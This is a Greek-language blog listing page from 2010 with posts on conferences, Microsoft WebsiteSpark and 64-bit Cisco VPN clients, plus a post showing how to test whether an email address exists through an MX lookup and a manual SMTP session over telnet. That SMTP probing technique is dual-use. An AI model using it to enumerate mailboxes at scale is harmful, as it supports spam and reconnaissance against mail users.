https://www.eiseverywhere.com/ereg/newreg.php?eventid=7578&code=EOSBCCW1117
http://www.linux.com/community/events/details/138-open-source-meets-business-2010
http://www.idg.com/www/IDGProducts.nsf/0/AB1A3B06E065BDED852576180063630E
http://www.coss.fi/en/events/open-source-business-conference-2010

Read more...
2 comments
704 views

Πως ελέγχουμε αν ένας λογαριασμός email υπάρχει, χωρίς να στείλουμε email;

By Blackman, February 16, 2010

Πρόσφατα αναζητούσα τον λόγο γιατί ένας υπολογιστής φαινόταν να μην έχει στείλει κάποια emails, παρόλο που φαινόντουσαν ότι είχαν φύγει. Το πρώτο πράγμα που ρώτησα τον χρήστη είναι το αν θα μπορούσαμε να στείλουμε δοκιμαστικό email και μετά να πάρουμε και ένα τηλέφωνο επιβεβαίωσης. Ο συνάδελφος μου είπε ότι κάτι τέτοιο δεν πρέπει να γίνει για πολλούς και διάφορους λόγους.
Οπότε πριν ξεκινήσω να ελέγχω οτιδήποτε θα έπρεπε να ελέγξω αν αυτές οι 5 διευθύνσεις που μου έδωσε ο χρήστης είναι valid και χωρίς να στείλω email. Τα πράγματα είναι απλά και γίνονται με την χρήση της εντολής nslookup και την χρήση telnet.
ΠΩΣ ΓΙΝΕΤΑΙ;
Αρχικά πρέπει να βρούμε τον mail exchange του domain που μας ενδιαφέρει.
Οπότε αν μιλάμε για ένα email λογαριασμό [email protected]
τότε θα πρέπει να γράψουμε
nslookup -q=mx blackdomain.com
η απάντηση που θα πάρουμε θα πρέπει να είναι της μορφής…
blackdomain.com MX preference = 10, mail exchanger = mail.blackdomain.com
mail.blackdomain.com internet address = 208.96.53.76

Στην συνέχεια συνδεόμαστε στον mail server mail.blackdomain.com
telnet mail.blackdomain.com 25
και πέρνουμε απάντηση τύπου…
220 mail.blackdomain.com ESMTP Postfix NO UCE NO UEMA C=US L=CA Unsolicated electronic mail advertisements strictly prohibited, subject to fine under CA law CBPC 17538.45. This electronic mail service provider’s equipment is located in the State of California. See http://www.blackdomain.com/static/inbound-email-policy.html for more information.
συνεχίζουμε και μιλάμε με το σύστημα γράφοντας…
helo hi
και παίρνουμε απάντηση τύπου…
250 mail.blackdomain.com

στην συνέχεια ελέγχουμε αν το σύστημα μπορεί να δεχτεί email από συγκεκριμένη διεύθυνση…
mail from: [email protected]
με απάντηση…
250 2.1.0 Ok
Οπότε μετά μπορούμε να ρωτήσουμε αν υπάρχει το mailbox που ψάχνουμε…
rcpt to: [email protected]

με απάντηση (αν δεν υπάρχει ή κάτι σχετικό):
550 5.1.1 [email protected]: Recipient address rejected: User unknown in local recipient table.
και μετά κλείνουμε την σύνδεση με την εντολή quit.
ΠΑΡΑΤΗΡΗΣΕΙΣ:
1) Το νούμερο 550 σημαίνει ότι η διεύθυνση συντακτικά είναι σωστή, αλλά λάθος σαν ύπαρξη mailbox.
2) Εάν υπάρχει ο συγκεκριμένος λογαριασμός τότε η απάντηση δεν θα έδινε 550, αλλά 250.
3) Ο συγκεκριμένος τρόπος δεν ενδείκνυται για χρήση σε gmail ή yahoo ή ότι άλλο τέτοιου τύπου, καθώς η IP σας μπορεί να καταλήξει σε κάποια blacklist.

Ελπίζω να φανεί και σε άλλους χρήσιμο.

Read more...
11 comments
3226 views

Πως μπορείς να αποκτήσεις την ‘σπίθα’ για δουλειά; (WebsiteSpark)

By Blackman, January 22, 2010

Δεν ξέρεις πως να αποκτήσεις την σπίθα; Πως να ξεκινήσεις να δουλεύεις; Θες μία βοήθεια για να το κάνεις; Ασχολείσαι και με το Web development; Τότε τι περιμένεις;
Το παρακάτω άρθρο σε ενδιαφέρει γενικά σαν γνώση (εντυπωσιάστηκα και εγώ όταν το άκουσα), αλλά και επαγγελματικά αν ασχολείσαι ή έχεις εταιρεία που ασχολείται με την δημιουργία ιστοσελίδων. Η Microsoft ήρθε να σε βοηθήσει. (γράφω σαν διαφήμιση aman teleshoping)
Οπότε κράτα το χαμόγελο σου αν ισχύουν κάτι από τα παρακάτω:
Το σύνολο των υπαλλήλων της εταιρείας (συμπεριλαμβανομένων και των ιδιοκτητών) να μη ξεπερνάει τους 10 Η εταιρεία ή ο επαγγελματίας θα πρέπει να δραστηριοποιείται στο Σχεδιασμό – Κατασκευή Web Σελίδων/Εφαρμογών Να διαθέτει και να κοινοποιει τουλάχιστον 1 καινούριο Web Site σε διάστημα 6 μηνών χρησιμοποιώντας τα παραπάνω εργαλεία και λογισμικό σε συνδυασμό με υπηρεσία: Self-Hostιng με ιδιόκτητο HW εξοπλισμο και στο χώρο του ή σε Collocation Ή Dedicated/Virtual Dedicated Hosting σε έναν από τους συνεργαζόμενους στο πρόγραμμα Hosters. ------------
Το όνομα αυτού λέγεται Microsoft WebisteSpark και ουσιαστικά παρέχει δωρεάν στον επαγγελματία το λογισμικό και τις λύσεις της Microsoft αλλά και την τεχνική εξυπηρέτηση και εκπαίδευση.
Τι μπορεί να βρει κανείς σε αυτό το ‘πακέτο’; Παραθέτω τα στοιχεία που προωθεί η ίδια η Microsoft και φαίνονται αρκετά κατατοπιστικά.
Ανάπτυξη Επιχειρηματικότητας
· WebsiteSpark Marketplace (powered by Pinpoint). Ο δικτυακός τόπος όπου ο επαγγελματίας μπορεί να δείξει τη δουλειά του απλουστεύοντας έτσι τη διαδικασία επαφής με υποψήφιους πελάτες.
· Portal Προσέλκυσης Συνεργατών. Ο δικτυακός τόπος MPN που προσφέρεται η δυνατότητα αναζήτησης και προσέλκυσης συνεργατών με συμπληρωτικές ικανότητες
· Web App Gallery. Ο δικτυακός τόπος που παρέχει άμεση πρόσβαση σε γνωστές και διαθέσιμες Web εφαρμογές της κοινότητας. Οι επαγγελματίες έχουν τη δυνατότητα να βρουν εδώ και να χρησιμοποιήσουν τις πιο διάσημες εφαρμογές και λύσεις. Αυτές οι εφαρμογές έχουν ελεγxθεί για την συμβατότητα τους με την πλατφόρμα Web της Microsoft, και μπορούν να εγκατασταθούν και να λειτουργήσουν απευθείας σε λίγα «clicks».
Υποστήριξη και Κατάρτιση
Το Microsoft WebsiteSpark παρέχει στον επαγγελματία τεχνική υποστήριξη και εκπαίδευση προκειμένου να τον βοηθήσει με την τεχνική κατάρτιση:
· Δυο περιπτώσεις υποστήριξης που καλύπτουν την επίλυση τεχνικών προβλημάτων.
· Πρόσβαση στην ευρύτερη κοινότητα τεχνικής υποστήριξης από συνεργάτες.
· Απεριόριστη πρόσβαση στα τεχνικά newsgroups του MSDN.
· Απεριόριστη υποστήριξη σε μη τεχνικά θέματα.

Ισχυρή Εργαλειοθήκη
· Εργαλεία Σχεδίασης / Ανάπτυξης / Ελέγχου / Δοκιμής. Κάθε εταιρεία θα αδειοδοτείται με:
o Visual Studio® 2008 Professional Edition – 3 άδειες χρήσης
o Expression® Studio 2 (or 3) – 1 άδεια χρήσης,
o Expression® Web 2 (or 3) – 2 άδειες χρήσης
o Windows Web Server ® 2008 R2 – 3 άδειες χρήσης
o SQL Server® 2008 Web – 3 άδειες χρήσης
· Για Παραγωγή και Διάθεση. Αν η εταιρεία φιλοξενεί υπηρεσίες Web (Self-Hosting ή Collocation) και έχει εγγραφεί στο SPLAe ή χρησιμοποιήσει υπηρεσία Dedicated ή Virtual-Dedicated Hosting από συνεργαζόμενο πάροχο υπηρεσιών διαδικτύου, τότε αδειοδοτείται με τέσσερεις παραγωγικές άδειες από:
o Windows Web Server 2008 R2
o SQL Server 2008 Web
· DotNetPanel control panel. Εφαρμογή πίνακα ελέγχου για την αποδοτική διαχείριση των παραμέτρων φιλοξενίας υπηρεσιών.

Πως σας φαίνεται; Νομίζω πολύ καλό για κάποιον που θέλει να κάνει μία αρχή και να μειώσει τα κόστη του. Φυσικά μοναδική επιβάρυνση είναι ότι όποιος θέλει να φύγει από το πρόγραμμα πριν ή μετά το πέρας τριών ετών, πρέπει να δώσει ένα ποσό της τάξης των 100$.
Αξίζει. Δεν νομίζετε; Το πρόγραμμα ξεκίνησε στα τέλη του περασμένου χρόνου…δηλαδή πριν 2-3 μήνες και φαίνεται ότι έχει κάνει το ‘κλικ’ στην αγορά. Φυσικά σκοπός δεν είναι άλλος από το να χτυπήσει τις αντίστοιχες λύσεις web development (open source) που χρησιμοποιούνται κατά κόρoν. Πρέπει να σημειώσω ότι από πλευράς marketing είναι πολύ καλή κίνηση, δίνοντας ενα τρομερά ανταγωνιστικό πακέτο μαζί με υποστήριξη. Τελικά τα παιδιά στο τμήμα Marketing του Redmond έχουν πιάσει το νόημα.
http://www.microsoft.com/WEB/websitespark/
http://www.mydigitallife.info/2009/10/05/microsoft-websitespark-another-spark-program-for-web-developers/
http://www.downloadsquad.com/2009/09/24/microsoft-launches-website-spark-hopes-web-devs-will-take-candy/

Read more...
3 comments
862 views

VPN = Virtual Problematic Networking ??? Που να βρεις σωστό client για 64bit σύστημα;

By Blackman, January 12, 2010

Για όσους είναι κάτοχοι Cisco router, πολύ πιθανόν να έχουν υλοποιήσει VPN και να έχουν προμηθευτεί το Cisco VPN Client, για να κάνουν αυτή την δουλειά. Μία διαδικασία που δεν χρειάζεται να στείνεις κάποιον VPN server, καθώς με την κατάλληλη παραμετροποίηση την λύση την έχουμε μέσω του ίδιου του router.
Έτσι στην εταιρεία που εργάζομαι, σε όλα τα laptops βάζαμε το σχετικό Cisco VPN client και έχοντας ρυθμίσει τα απαραίτητα (username & password) ο εκάστοτε χρήστης συνδεόταν στο εταιρικό δίκτυο. Τα πράγματα αρκετό καιρό τώρα δεν προχωρούσαν όπως θα έπρεπε. Καθώς ο Cisco VPN client είναι αποκλειστικά για 32bit συστήματα και ΔΕΝ ΛΕΙΤΟΥΡΓΕΙ ΣΕ 64bit συστήματα.
Η λύση που δίνει η Cisco, λέγεται AnyConnect VPN Client και είναι φτιαγμένος για να παίζει εύκολα στα 64bit συστήματα. Ωραία θα πει κάποιος, υπάρχει λύση, οπότε που είναι το πρόβλημα; Το πρόβλημα εστιάζεται στο ότι εάν έχετε ήδη υλοποίηση με κάποιο router και δουλεύετε το Cisco VPN client, το AnyConnect VPN Client πιθανότατα να μην παίξει σε εσάς. Το 64bit πρόγραμμα βλέπεται παίζει μονάχα σε ASA (Adaptive Security Appliance) και όχι σε άλλου τύπου router της Cisco. Δηλαδή όσοι έχετε το επονομαζόμενο PIX (Private Internet Exchange Firewall) δεν θα καταφέρεται ποτέ να συνδεθείτε με VPN στο σύστημα σας. Τι σημαίνει αυτό; Απλά…θα πρέπει να αλλάξετε router!!!!
Οπότε σε αυτή την διαδικασία ξεκίνησα αρκετό καιρό τώρα να ψάχνω λύσεις που θα μου έδιναν συνδεσιμότητα με την εταιρεία μέσω 64bit συστήματος. Λύσεις υπάρχουν διάφορες, όπως το OpenVPN και άλλες. Το πρόβλημα όμως ήταν ότι σε όλες τις σχετικές λύσεις θα έπρεπε να γίνει κάποια εγκατάσταση-παραμετροποίηση σε κάποιο μηχάνημα (server ή client) για να κατάφερνα αυτό που ήθελα.
Τελικά λύση υπάρχει και είναι πολύ πιο εύκολη. Τόσο εύκολη που απλά κάνεις Import το σχετικό .pcf (profile file) και παίζεις. Η λύση είναι ένας Universal IPsec VPN client που ονομάζεται NCP Secure Entry Client και όπως μπορείτε να δείτε αναφέρεται ότι είναι “First IPsec VPN Client Suite for Windows 7 in the world”. Μπορείτε να το δοκιμάσετε για 30 ημέρες σε full έκδοση και στην συνέχεια εάν σας κάνει να το αγοράσετε με κόστος 120€.
Αξίζει να σημειωθεί ότι υπάρχουν και οι εξής client:
NCP Secure Entry Symbian Client (κόστος 69€)
NCP Secure Entry Windows Mobile Client (κόστος 69€)
Σε αυτή την περίπτωση το μοναδικό πράγμα που έκανα ήταν Import το pcf αρχείο στο πρόγραμμα αυτό και τέλος. Η διαδικασία μου πήρε 1 δευτερόλεπτο και το σύστημα έπαιξε απροβλημάτιστα. Δεν έστησα τίποτα άλλο, δεν παραμετροποίησα τίποτα απολύτως. Απλά χρησιμοποίησα το συγκεκριμένο πρόγραμμα με το pcf αρχείο που είχα.
Πλέον θέλω να δοκιμάσω και τους δύο clients για τα κινητά για να δω το πόσο καλά λειτουργούν. Μόλις το κάνω και αυτό θα ενημερώσω αντίστοιχα.

Read more...
16 comments
1828 views

Sign In

Blackman

Posts

Joined

Last visited

Days Won

Content Type

Profiles

Articles

Forums

Blogs

Blog Entries posted by Blackman

War games!

Hotmail στο κινητό… ως Microsoft Exchange…και ΟΧΙ pop3

Το Κρασί Δεν Είναι Εξομοιωτής ! ! ! !

Hack-in Gate…

back|track 4 : (lesson 1) networking

back|track 4 : (lesson 3) Information Gathering: TheHarvester

back|track 4 : (lesson 2) Information Gathering: 0trace

Back to the Track 4

Αλήθειες και ψέματα για WiFi cracking

Hack My… IT Pro Connections

Back to back...following your track...I'm using...Linux Backtrack

Deploying Linux VM on Hyper-V 2008 R2 (How to)

SQL Server Driver for PHP 2.0

Διανομές Linux (τα άπαντα) - Part 4

Διανομές Linux (τα άπαντα) - Part 3

Διανομές Linux (τα άπαντα) - Part 1

Διανομές Linux (τα άπαντα) - Part 2

Απλή παρατήρηση… Open και Close Source πάνε μαζί; Από πια οπτική γωνία όμως;

Linux Integration Services RC for Hyper-V

Windows Server 2008 R2 Feature Components Poster

SQL Injection – hacking websites και όχι μόνο

Η Microsoft Platinum Sponsor στο ετήσιο Open Source Business Conference 2010

Πως ελέγχουμε αν ένας λογαριασμός email υπάρχει, χωρίς να στείλουμε email;

Πως μπορείς να αποκτήσεις την ‘σπίθα’ για δουλειά; (WebsiteSpark)

VPN = Virtual Problematic Networking ??? Που να βρεις σωστό client για 64bit σύστημα;

Browse

Activity

Pages